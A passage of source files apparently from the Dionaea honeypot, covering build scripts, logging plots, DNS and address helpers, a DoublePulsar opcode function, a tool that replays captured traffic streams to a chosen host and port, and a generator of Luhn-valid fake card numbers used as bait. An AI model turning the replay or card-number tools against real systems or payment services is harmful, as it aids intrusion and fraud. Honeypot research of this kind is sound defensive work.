mode="rb") 41 | while 1: 42 | buf = fh.read(4096) 43 | if len(buf) == 0: 44 | break 45 | digest.update(buf) 46 | fh.close() 47 | return digest.hexdigest() 48 | 49 | def xor(data, key): 50 | l = len(key) 51 | return bytearray(( 52 | (data[i] ^ key[i % l]) for i in range(0,len(data)) 53 | )) 54 | 55 | def calculate_doublepulsar_opcode(t): 56 | op = (t) + (t >> 8) + (t >> 16) + (t >> 24); 57 | return op 58 | -------------------------------------------------------------------------------- /modules/python/setup.py.in: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from distutils.core import setup 29 | from distutils.extension import Extension 30 | from Cython.Distutils import build_ext 31 | 32 | from distutils import sysconfig 33 | 34 | # The SlackWare Diaries ... 35 | # we do not want python2.x to add its -lpython2.x to the linker 36 | # even if Py_ENABLE_SHARED is 1 37 | # therefore we have to adjust the global Py_ENABLE_SHARED value in the 38 | # distutils.sysconfig._config_vars dict 39 | # the proper fix would be not using py2 to build the module but py3 instead 40 | # thanks to pyllyukko for his incredible patience with me working this out 41 | #if sysconfig.get_config_var('Py_ENABLE_SHARED') == 1: 42 | # sysconfig._config_vars['Py_ENABLE_SHARED'] = 0 43 | 44 | 45 | cflags='' 46 | cflags+='@LIB_GLIB_CFLAGS@' # glib 47 | cflags+=' ' 48 | cflags+='@LIB_EV_CFLAGS@ -fno-strict-aliasing' # libev 49 | cflags+=' ' 50 | cflags+='@LIB_LCFG_CFLAGS@' #liblcfg 51 | cflags+=' ' 52 | cflags+='@PYTHON_CSPEC@' # python 53 | cflags+=' ' 54 | cflags+='@CFLAGS_DEFAULT@' 55 | cflags+=' ' 56 | cflags+='@CFLAGS_DEBUG@' 57 | 58 | libs='' 59 | libs+='@PYTHON_LSPEC@' # python 60 | 61 | 62 | 63 | include_dir_dict = {} 64 | extra_compile_dict = {} 65 | for i in cflags.split(): 66 | if i.startswith('-I'): 67 | include_dir_dict[i[2:]] = 1 68 | else: 69 | extra_compile_dict[i] = 1 70 | 71 | 72 | library_dict = {} 73 | library_dir_dict = {} 74 | library_other_dict = {} 75 | 76 | for i in libs.split(): 77 | if i.startswith('-l'): 78 | library_dict[i[2:]] = 1 79 | elif i.startswith('-L'): 80 | library_dir_dict[i[2:]] = 1 81 | else: 82 | library_other_dict[i] = 1 83 | 84 | ext_modules=[ 85 | Extension("dionaea.core", 86 | ['binding.pyx', 'module.c', 'pyev/pyev.c'], 87 | language="c", 88 | include_dirs=['../../include', '../../'] + [k for k in sorted(include_dir_dict)], 89 | extra_compile_args=[k for k in sorted(extra_compile_dict)], 90 | libraries=[k for k in sorted(library_dict)], 91 | library_dirs=[k for k in sorted(library_dir_dict)], 92 | extra_link_args=[k for k in sorted(library_other_dict)], 93 | undef_macros=[('NDEBUG')], 94 | define_macros=[('_GNU_SOURCE',None)] 95 | ), 96 | ] 97 | 98 | setup( 99 | name = 'dionaea', 100 | cmdclass = {'build_ext': build_ext}, 101 | ext_modules = ext_modules, 102 | ) 103 | 104 | -------------------------------------------------------------------------------- /modules/python/util/Makefile.am: -------------------------------------------------------------------------------- 1 | AUTOMAKE_OPTIONS = foreign 2 | 3 | bin_SCRIPTS = readlogsqltree gnuplotsql 4 | CLEANFILES = $(bin_SCRIPTS) 5 | EXTRA_DIST = readlogsqltree.py gnuplotsql.py 6 | 7 | 8 | do_subst = sed -e 's,[@]PYTHON[@],$(PYTHON),g' 9 | 10 | readlogsqltree: readlogsqltree.py 11 | $(do_subst) < readlogsqltree.py > readlogsqltree 12 | chmod +x readlogsqltree 13 | 14 | gnuplotsql: gnuplotsql.py 15 | $(do_subst) < gnuplotsql.py > gnuplotsql 16 | chmod +x gnuplotsql 17 | 18 | install-exec-hook: 19 | -rm -f $(bin_SCRIPTS) 20 | -------------------------------------------------------------------------------- /modules/python/util/csv2sqlite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # create a sqlite database from a csv file 4 | # creates table schema and inserts rows 5 | # can handle multiple csv files 6 | # 7 | # ./csv2sqlite a.csv bs.csv 8 | # will create tables a and bs and bs will get the primary key of type integer "b" 9 | # 10 | 11 | import sqlite3 12 | import csv 13 | import sys 14 | import argparse 15 | import codecs 16 | 17 | if __name__ == '__main__': 18 | 19 | parser = argparse.ArgumentParser(description='Update a sqlite Database with random but correct cc numbers') 20 | parser.add_argument('--database', help='the database to create', required=True) 21 | parser.add_argument('--primary-key', help='create a primary key') 22 | parser.add_argument('files', nargs='*', help='csv files to use as input') 23 | args = parser.parse_args() 24 | 25 | dbh = sqlite3.connect(args.database) 26 | cursor = dbh.cursor() 27 | 28 | for f in args.files: 29 | print("Processing File %s" % (f,)) 30 | c = csv.reader(codecs.open(f, 'r', encoding="utf-8-sig"), delimiter=',', quotechar='"') 31 | table = f[:-4] 32 | colnames = c.next() 33 | print("Using column names %s" % " ".join(colnames)) 34 | cols = ','.join(colnames) 35 | if args.primary_key is not None: 36 | cols2 = "%s INTEGER PRIMARY KEY, " % args.primary_key + cols 37 | else: 38 | cols2 = cols 39 | create_table = "CREATE TABLE %s ( %s )" % (table, cols2) 40 | insert_into = "INSERT INTO %s (%s) VALUES (%s) " % (table, cols, ','.join(['?' for i in colnames])) 41 | 42 | try: 43 | dbh.execute(create_table) 44 | except Exception as e: 45 | print("Could not CREATE table %s (%s))" % (table,e)) 46 | continue 47 | for i in c: 48 | try: 49 | cursor.execute(insert_into, i) 50 | except Exception as e: 51 | print("Could not insert %s into table %s (%s)" % (i,table,e)) 52 | print(insert_into) 53 | for i in cols: 54 | create_idx = "CREATE INDEX %s_idx ON %s (%s)" % (i,table,i) 55 | dbh.commit() 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /modules/python/util/gnuplotsql/gnuplot.example: -------------------------------------------------------------------------------- 1 | set terminal png size 600,600 nocrop butt font "/usr/share/fonts/truetype/ttf-liberation/LiberationSans-Regular.ttf" 8 2 | set output "{filename_output}" 3 | set xdata time 4 | set timefmt "%Y-%m-%d" 5 | set xrange ["{range_start}":"{range_stop}"] 6 | set format x "%b %d" 7 | set xlabel "date" 8 | set ylabel "count" 9 | set y2label "count" 10 | set y2tics 11 | set grid 12 | 13 | set size 1.0,0.5 14 | 15 | set style line 1 lt rgb "#00C613" 16 | set style line 2 lt rgb "#6AFFA0" 17 | set style line 3 lt rgb "#23FF38" 18 | set style line 4 lt rgb "#75BF0F" 19 | set style line 5 lt rgb "#A1FF00" 20 | set style line 6 lt rgb "red" 21 | 22 | unset logscale y 23 | set datafile separator "|" 24 | set multiplot 25 | 26 | set origin 0.0,0.5 27 | plot "{filename_data}" using 1:3 title "accept" with lines, \ 28 | "" using 1:4 title "shellcode" with lines, \ 29 | "" using 1:5 title "offers" with lines, \ 30 | "" using 1:6 title "downloads" with lines, \ 31 | "" using 1:7 title "uniq" with lines, \ 32 | "" using 1:8 title "new" with lines 33 | 34 | set origin 0.0,0.0 35 | plot "{filename_data}" using 1:2 title "hosts" with lines 36 | 37 | unset multiplot 38 | -------------------------------------------------------------------------------- /modules/python/util/gnuplotsql/gnuplot.svg.example: -------------------------------------------------------------------------------- 1 | set terminal svg enhanced size 600,600 font "arial,8" 2 | set output "{filename_output}" 3 | set xdata time 4 | set timefmt "%Y-%m-%d" 5 | set xrange ["{range_start}":"{range_stop}"] 6 | set format x "%b %d" 7 | set xlabel "date" 8 | set ylabel "count" 9 | set y2label "count" 10 | set y2tics 11 | set grid 12 | 13 | set size 1.0,0.5 14 | 15 | set style line 1 lt rgb "#00C613" 16 | set style line 2 lt rgb "#6AFFA0" 17 | set style line 3 lt rgb "#23FF38" 18 | set style line 4 lt rgb "#75BF0F" 19 | set style line 5 lt rgb "#A1FF00" 20 | set style line 6 lt rgb "red" 21 | 22 | unset logscale y 23 | set datafile separator "|" 24 | set multiplot 25 | 26 | set origin 0.0,0.5 27 | plot "{filename_data}" using 1:3 title "accept" with lines, \ 28 | "" using 1:4 title "shellcode" with lines, \ 29 | "" using 1:5 title "offers" with lines, \ 30 | "" using 1:6 title "downloads" with lines, \ 31 | "" using 1:7 title "uniq" with lines, \ 32 | "" using 1:8 title "new" with lines 33 | 34 | set origin 0.0,0.0 35 | plot "{filename_data}" using 1:2 title "hosts" with lines 36 | 37 | unset multiplot 38 | -------------------------------------------------------------------------------- /modules/python/util/retry.py: -------------------------------------------------------------------------------- 1 | #!/opt/dionaea/bin/python3.1 2 | 3 | from optparse import OptionParser 4 | import socket 5 | import os 6 | import shutil 7 | import sys 8 | import time 9 | 10 | parser = OptionParser() 11 | parser.add_option("-f", "--file", action="store", type="string", dest="filename") 12 | parser.add_option("-H", "--host", action="store", type="string", dest="host") 13 | parser.add_option("-p", "--port", action="store", type="int", dest="port") 14 | parser.add_option("-s", "--send", action="store_true", dest="send", default=False) 15 | parser.add_option("-r", "--recv", action="store_true", dest="recv", default=False) 16 | parser.add_option("-t", "--tempfile", action="store", type="string", dest="tempfile", default="retrystream") 17 | parser.add_option("-u", "--udp", action="store_true", dest="udp", default=False) 18 | parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False) 19 | (options, args) = parser.parse_args() 20 | 21 | if os.path.exists(options.tempfile): 22 | os.unlink(options.tempfile) 23 | shutil.copy (options.filename, options.tempfile + ".py") 24 | 25 | sys.path.append(".") 26 | import_string = "from " + options.tempfile + " import stream" 27 | exec(import_string) 28 | 29 | print("doing " + options.filename) 30 | if options.send: 31 | if options.udp == False: 32 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 33 | else: 34 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 35 | 36 | s.connect((options.host, options.port)) 37 | 38 | for i in stream: 39 | if i[0] == 'in': 40 | r = 0 41 | if options.send == True: 42 | r = s.send(i[1]) 43 | if options.verbose: 44 | print('send %i of %i bytes' % (r, len(i[1]))) 45 | if i[0] == 'out': 46 | x = "" 47 | if options.recv == True: 48 | x = s.recv(len(i[1])) 49 | if options.verbose: 50 | print('recv %i of %i bytes' % ( len(x), len(i[1])) ) 51 | time.sleep(1) 52 | 53 | time.sleep(1) 54 | -------------------------------------------------------------------------------- /modules/python/util/updateccs.py: -------------------------------------------------------------------------------- 1 | #!/opt/dionaea/bin/python3 2 | # 3 | # 4 | # Basing on: 5 | # gencc: A simple program to generate credit card numbers that pass the MOD 10 check 6 | # (Luhn formula). 7 | # Usefull for testing e-commerce sites during development. 8 | # 9 | # Copyright 2003 Graham King 10 | # 11 | # This program is free software; you can redistribute it and/or modify 12 | # it under the terms of the GNU General Public License as published by 13 | # the Free Software Foundation; either version 2 of the License, or 14 | # (at your option) any later version. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License 22 | # along with this program; if not, write to the Free Software 23 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 24 | # 25 | # http://www.darkcoding.net/credit-card-generator/ 26 | # 27 | 28 | from random import Random 29 | import sys 30 | import copy 31 | import sqlite3 32 | import argparse 33 | 34 | visaPrefixList = [ ['4', '5', '3', '9'], 35 | ['4', '5', '5', '6'], 36 | ['4', '9', '1', '6'], 37 | ['4', '5', '3', '2'], 38 | ['4', '9', '2', '9'], 39 | ['4', '0', '2', '4', '0', '0', '7', '1'], 40 | ['4', '4', '8', '6'], 41 | ['4', '7', '1', '6'], 42 | ['4'] ] 43 | 44 | mastercardPrefixList = [ ['5', '1'], 45 | ['5', '2'], 46 | ['5', '3'], 47 | ['5', '4'], 48 | ['5', '5'] ] 49 | 50 | amexPrefixList = [ ['3', '4'], 51 | ['3', '7'] ] 52 | 53 | discoverPrefixList = [ ['6', '0', '1', '1'] ] 54 | 55 | dinersPrefixList = [ ['3', '0', '0'], 56 | ['3', '0', '1'], 57 | ['3', '0', '2'], 58 | ['3', '0', '3'], 59 | ['3', '6'], 60 | ['3', '8'] ] 61 | 62 | enRoutePrefixList = [ ['2', '0', '1', '4'], 63 | ['2', '1', '4', '9'] ] 64 | 65 | jcbPrefixList16 = [ ['3', '0', '8', '8'], 66 | ['3', '0', '9', '6'], 67 | ['3', '1', '1', '2'], 68 | ['3', '1', '5', '8'], 69 | ['3', '3', '3', '7'], 70 | ['3', '5', '2', '8'] ] 71 | 72 | jcbPrefixList15 = [ ['2', '1', '0', '0'], 73 | ['1', '8', '0', '0'] ] 74 | 75 | voyagerPrefixList = [ ['8', '6', '9', '9'] ] 76 | 77 | 78 | """ 79 | 'prefix' is the start of the CC number as a string, any number of digits. 80 | 'length' is the length of the CC number to generate. Typically 13 or 16 81 | """ 82 | def completed_number(prefix, length): 83 | ccnumber = prefix 84 | 85 | # generate digits 86 | while len(ccnumber) < (length - 1): 87 | digit = generator.choice(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']) 88 | ccnumber.append(digit) 89 | 90 | # Calculate sum 91 | sum = 0 92 | pos = 0 93 | reversedCCnumber = [] 94 | reversedCCnumber.extend(ccnumber) 95 | reversedCCnumber.reverse() 96 | 97 | while pos < length - 1: 98 | odd = int( reversedCCnumber[pos] ) * 2 99 | if odd > 9: 100 | odd -= 9 101 | sum += odd 102 | if pos != (length - 2): 103 | sum += int( reversedCCnumber[pos+1] ) 104 | pos += 2 105 | # Calculate check digit 106 | checkdigit = ((sum / 10 + 1) * 10 - sum) % 10 107 | ccnumber.append( str(checkdigit) ) 108 | return ''.join(ccnumber) 109 | 110 | 111 | def credit_card_number(generator, prefixList, length): 112 | if type(length) is list: 113 | length = generator.choice(length) 114 | ccnumber = copy.copy( generator.choice(prefixList) ) 115 | return completed_number(ccnumber, length) 116 | 117 | generator = None 118 | 119 | def gencc(card): 120 | global generator 121 | cards = { "MasterCard": { "prefix" : mastercardPrefixList, "length": 16 }, 122 | "Visa":{ "prefix" : visaPrefixList, "length": [13,16] }, 123 | "AmericanExpress":{ "prefix" : amexPrefixList, "length": 15 }, 124 | } 125 | if generator is None: 126 | generator = Random() 127 | generator.seed() # Seed from current time 128 | 129 | if card in cards: 130 | return credit_card_number(generator, cards[card]['prefix'], cards[card]['length']) 131 | raise ValueException("card %s is unknown" % card) 132 | 133 | if __name__ == '__main__': 134 | 135 | parser = argparse.ArgumentParser(description='Update a sqlite Database with random but correct cc numbers') 136 | parser.add_argument('database', help='the database to use') 137 | parser.add_argument('--table', help='the table to update', required=True) 138 | parser.add_argument('--type-col', help='the column containing the cc type', required=True) 139 | parser.add_argument('--num-col', help='the column containing the cc number', required=True) 140 | args = parser.parse_args() 141 | 142 | dbh = sqlite3.connect(args.database) 143 | dbh.create_function("gencc",1,gencc) 144 | 145 | cursor = dbh.cursor() 146 | query = "UPDATE {:s} SET {:s}=CAST(gencc({:s}) AS INTEGER)".format(args.table,args.num_col,args.type_col) 147 | print(query) 148 | cursor.execute(query) 149 | dbh.commit() 150 | print("updated the ccs for %i rows" % cursor.rowcount) 151 | 152 | -------------------------------------------------------------------------------- /modules/xmatch/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_XMATCH_CFLAGS) 9 | AM_LDFLAGS = $(LIB_XMATCH_LIBS) 10 | 11 | pkglib_LTLIBRARIES = xmatch.la 12 | 13 | xmatch_la_SOURCES = module.c xmatch.c 14 | 15 | xmatch_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/xmatch/module.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | #include 31 | 32 | #include "modules.h" 33 | #include "connection.h" 34 | #include "dionaea.h" 35 | 36 | #include "module.h" 37 | #include "processor.h" 38 | 39 | #define D_LOG_DOMAIN "xmatch" 40 | 41 | 42 | static bool xmatch_config(struct lcfgx_tree_node *node) 43 | { 44 | g_debug("%s", __PRETTY_FUNCTION__); 45 | return true; 46 | } 47 | 48 | static bool xmatch_prepare(void) 49 | { 50 | g_debug("%s", __PRETTY_FUNCTION__); 51 | g_hash_table_insert(g_dionaea->processors->names, (void *)proc_xmatch.name, &proc_xmatch); 52 | return true; 53 | } 54 | 55 | static bool xmatch_new(struct dionaea *d) 56 | { 57 | g_debug("%s", __PRETTY_FUNCTION__); 58 | return true; 59 | } 60 | 61 | static bool xmatch_free(void) 62 | { 63 | g_debug("%s", __PRETTY_FUNCTION__); 64 | return true; 65 | } 66 | 67 | static bool xmatch_hup(struct lcfgx_tree_node *node) 68 | { 69 | g_debug("%s", __PRETTY_FUNCTION__); 70 | return true; 71 | } 72 | 73 | struct module_api *module_init(struct dionaea *d) 74 | { 75 | g_debug("%s:%i %s dionaea %p",__FILE__, __LINE__, __PRETTY_FUNCTION__, d); 76 | static struct module_api xmatch_api = 77 | { 78 | .config = &xmatch_config, 79 | .prepare = &xmatch_prepare, 80 | .new = &xmatch_new, 81 | .free = &xmatch_free, 82 | .hup = &xmatch_hup 83 | }; 84 | 85 | return &xmatch_api; 86 | } 87 | -------------------------------------------------------------------------------- /modules/xmatch/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef __DIONAEA_XMATCH_H 29 | #define __DIONAEA_XMATCH_H 30 | 31 | #include 32 | 33 | struct lcfgx_tree_node; 34 | struct processor_data; 35 | struct connection; 36 | 37 | 38 | struct xmatch_ctx 39 | { 40 | char *patternfile; 41 | xm_string_t **p; 42 | size_t pnum; 43 | size_t maxlen; 44 | xm_fsm_t *fsm; 45 | }; 46 | 47 | void *proc_xmatch_ctx_new(void *cfg); 48 | void proc_xmatch_ctx_free(void *ctx); 49 | void *proc_xmatch_ctx_cfg_new(struct lcfgx_tree_node *node); 50 | void proc_xmatch_on_io_in(struct connection *con, struct processor_data *pd); 51 | 52 | extern struct processor proc_xmatch; 53 | 54 | #endif 55 | -------------------------------------------------------------------------------- /src/LICENSE.openssl: -------------------------------------------------------------------------------- 1 | This LICENSE file is a modification to the main LICENSE file, which is 2 | GPLv2. It applies only to the files in the "src" directory. 3 | 4 | In addition, as a special exception, the copyright holders give 5 | permission to link the code of this program with the OpenSSL library, 6 | and distribute linked combinations including the two. 7 | You must obey the GNU General Public License in all respects 8 | for all of the code used other than OpenSSL. If you modify 9 | file(s) with this exception, you may extend this exception to your 10 | version of the file(s), but you are not obligated to do so. If you 11 | do not wish to do so, delete this exception statement from your 12 | version. If you delete this exception statement from all source 13 | files in the program, then also delete it here. 14 | 15 | 16 | -------------------------------------------------------------------------------- /src/Makefile.am: -------------------------------------------------------------------------------- 1 | AUTOMAKE_OPTIONS = foreign 2 | 3 | AM_CFLAGS = -I../include -I .. -fno-strict-aliasing 4 | AM_LDFLAGS = 5 | 6 | 7 | bin_PROGRAMS = dionaea 8 | 9 | 10 | dionaea_CFLAGS = ${LIB_EV_CFLAGS} ${LIB_GLIB_CFLAGS} ${LIB_LCFG_CFLAGS} 11 | dionaea_LDFLAGS = ${LIB_EV_LIBS} ${LIB_GLIB_LIBS} ${LIB_LCFG_LIBS} 12 | 13 | dionaea_CFLAGS += ${LIB_SSL_CFLAGS} ${LIB_UDNS_CFLAGS} ${LIB_GC_CFLAGS} 14 | dionaea_LDFLAGS += ${LIB_SSL_LIBS} ${LIB_UDNS_LIBS} ${LIB_GC_LIBS} 15 | 16 | dionaea_CFLAGS += ${AM_CFLAGS} 17 | dionaea_LDFLAGS += ${AM_LDFLAGS} 18 | 19 | 20 | dionaea_SOURCES = dionaea.c 21 | dionaea_SOURCES += dns.c 22 | dionaea_SOURCES += refcount.c 23 | dionaea_SOURCES += node_info.c 24 | dionaea_SOURCES += util.c 25 | dionaea_SOURCES += connection.c 26 | dionaea_SOURCES += modules.c 27 | dionaea_SOURCES += pchild.c 28 | dionaea_SOURCES += log.c 29 | dionaea_SOURCES += signals.c 30 | dionaea_SOURCES += incident.c 31 | dionaea_SOURCES += threads.c 32 | dionaea_SOURCES += bistream.c 33 | dionaea_SOURCES += processor.c 34 | -------------------------------------------------------------------------------- /src/dns.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | #include 33 | #include 34 | #include 35 | 36 | #include "dionaea.h" 37 | #include "dns.h" 38 | 39 | 40 | void udns_io_in_cb(EV_P_ struct ev_io *w, int revents) 41 | { 42 | // puts(__PRETTY_FUNCTION__); 43 | dns_ioevent(g_dionaea->dns->dns, 0); 44 | } 45 | 46 | 47 | void udns_timeout_cb(EV_P_ struct ev_timer *w, int revents) 48 | { 49 | // puts(__PRETTY_FUNCTION__); 50 | // int dns_timeouts(ctx, int maxwait, time_t now) 51 | int ret = dns_timeouts(g_dionaea->dns->dns, 3, 0); 52 | if( ret == -1 ) 53 | { 54 | ev_timer_stop(EV_A_ &g_dionaea->dns->dns_timeout); 55 | } else 56 | { 57 | ev_timer_stop(EV_A_ &g_dionaea->dns->dns_timeout); 58 | ev_timer_init(&g_dionaea->dns->dns_timeout, udns_timeout_cb, ret*1.0, 0.); 59 | ev_timer_start(EV_A_ &g_dionaea->dns->dns_timeout); 60 | } 61 | } 62 | 63 | void udns_set_timeout_cb(struct dns_ctx *ctx, int timeout, void *data) 64 | { 65 | // puts(__PRETTY_FUNCTION__); 66 | struct ev_loop *loop = data; 67 | if( ctx == NULL ) 68 | { 69 | // printf("removing DNS timeout %s:%i\n", __FILE__, __LINE__); 70 | ev_timer_stop(loop, &g_dionaea->dns->dns_timeout); 71 | } else 72 | { 73 | if( timeout < 0 ) 74 | { 75 | ev_timer_stop(loop, &g_dionaea->dns->dns_timeout); 76 | // printf("removing DNS timeout %s:%i\n", __FILE__, __LINE__); 77 | } else 78 | if( timeout == 0 ) 79 | { 80 | // printf("immediate DNS timeout %s:%i\n", __FILE__, __LINE__); 81 | ev_timer_stop(loop, &g_dionaea->dns->dns_timeout); 82 | ev_timer_init(&g_dionaea->dns->dns_timeout, udns_timeout_cb, 0.0, 0.); 83 | ev_timer_start(loop, &g_dionaea->dns->dns_timeout); 84 | } else 85 | if( timeout > 0 ) 86 | { 87 | // printf("resetting DNS timeout to %i %s:%i\n", timeout, __FILE__, __LINE__); 88 | ev_timer_stop(loop, &g_dionaea->dns->dns_timeout); 89 | ev_timer_init(&g_dionaea->dns->dns_timeout, udns_timeout_cb, (double)timeout, 0.); 90 | ev_timer_start(loop, &g_dionaea->dns->dns_timeout); 91 | } 92 | } 93 | } 94 | -------------------------------------------------------------------------------- /src/node_info.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | 40 | #include "node_info.h" 41 | #include "util.h" 42 | #include "log.h" 43 | 44 | #define D_LOG_DOMAIN "node_info" 45 | 46 | 47 | bool node_info_set(struct node_info *node, struct sockaddr_storage *sa) 48 | { 49 | void *addroff = NULL; 50 | // socklen_t sizeof_sa = sizeof(struct sockaddr_storage); 51 | 52 | if( sa->ss_family == PF_INET6 ) 53 | { 54 | struct sockaddr_in6 *si6 = (struct sockaddr_in6 *)&node->addr; 55 | node->port = si6->sin6_port; 56 | addroff = &si6->sin6_addr; 57 | } else 58 | if( sa->ss_family == PF_INET ) 59 | { 60 | struct sockaddr_in *si = (struct sockaddr_in *)&node->addr; 61 | node->port = si->sin_port; 62 | addroff = &si->sin_addr; 63 | } else 64 | { 65 | if( sa->ss_family == PF_UNIX ) 66 | { 67 | struct sockaddr_un *su = (struct sockaddr_un *)&node->addr; 68 | addroff = &su->sun_path; 69 | } else 70 | 71 | return false; 72 | } 73 | 74 | if( sa->ss_family == PF_UNIX ) 75 | { 76 | snprintf(node->ip_string, 108, "un://%s", (char *)addroff); 77 | } else 78 | if( inet_ntop(sa->ss_family, addroff, (void *)&node->ip_string, INET6_ADDRSTRLEN) == NULL ) 79 | { 80 | g_warning("inet_ntop failed (%s)", strerror(errno)); 81 | return false; 82 | } 83 | 84 | if( sa->ss_family == PF_INET6 ) 85 | { 86 | if( ipv6_addr_linklocal(&((struct sockaddr_in6 *)sa)->sin6_addr) ) 87 | { 88 | snprintf(node->node_string,NODE_STRLEN,"[%s%s%s]:%i",node->ip_string, 89 | node->iface_scope[0]?"%":"",node->iface_scope[0]?node->iface_scope:"", 90 | ntohs(node->port)); 91 | } else 92 | { 93 | snprintf(node->node_string,NODE_STRLEN,"[%s]:%i",node->ip_string, 94 | ntohs(node->port)); 95 | } 96 | } else 97 | if( sa->ss_family == PF_INET ) 98 | { 99 | snprintf(node->node_string,NODE_STRLEN,"%s:%i",node->ip_string, ntohs(node->port)); 100 | } else 101 | if( sa->ss_family == PF_UNIX ) 102 | { 103 | snprintf(node->node_string,NODE_STRLEN,"%s",node->ip_string); 104 | } 105 | 106 | snprintf(node->port_string,PORT_STRLEN,"%i", ntohs(node->port)); 107 | 108 | return true; 109 | } 110 | 111 | void node_info_add_addr(struct node_info *node, const char *addr) 112 | { 113 | node->dns.resolved_addresses = g_realloc(node->dns.resolved_addresses,( node->dns.resolved_address_count + 2) *(sizeof(char *))); 114 | node->dns.resolved_addresses[node->dns.resolved_address_count] = g_strdup(addr); 115 | node->dns.resolved_address_count++; 116 | } 117 | 118 | 119 | const char *node_info_get_next_addr(struct node_info *node) 120 | { 121 | if( node->dns.resolved_address_count == 